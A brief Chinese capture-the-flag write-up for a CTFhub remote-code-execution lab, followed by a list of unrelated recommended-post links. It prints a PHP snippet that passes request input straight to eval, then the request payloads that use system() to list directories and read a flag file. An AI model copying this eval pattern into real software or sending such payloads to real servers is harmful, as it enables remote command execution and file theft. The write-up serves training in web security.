CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
士别三日&&当刮目相看几秒前
Spring两大核心思想:IoC和AOP
java·spring
147API8 分钟前
改名后的24小时:npm 包抢注如何劫持开源项目供应链
前端·npm·node.js
你想考研啊8 分钟前
win11配置maven
java·数据库·maven
ziqi52210 分钟前
第二十二天笔记
前端·chrome·笔记
鹤归时起雾.10 分钟前
react一阶段学习
前端·学习·react.js
独自破碎E11 分钟前
LCR001-两数相除
java·开发语言
tkevinjd12 分钟前
5-Web基础
java·spring boot·后端·spring
Eiceblue13 分钟前
通过 C# 解析 HTML:文本提取 + 结构化数据获取
c#·html·.net·visual studio
weixin_4569074115 分钟前
使用 html为 ppt 文档添加文本像素格的实用方法
html·tensorflow·powerpoint
2301_7806698616 分钟前
HTML-CSS-常见标签和样式(标题的排版、标题的样式、选择器、正文的排版、正文的样式、整体布局、盒子模型)
前端·css·html·javaweb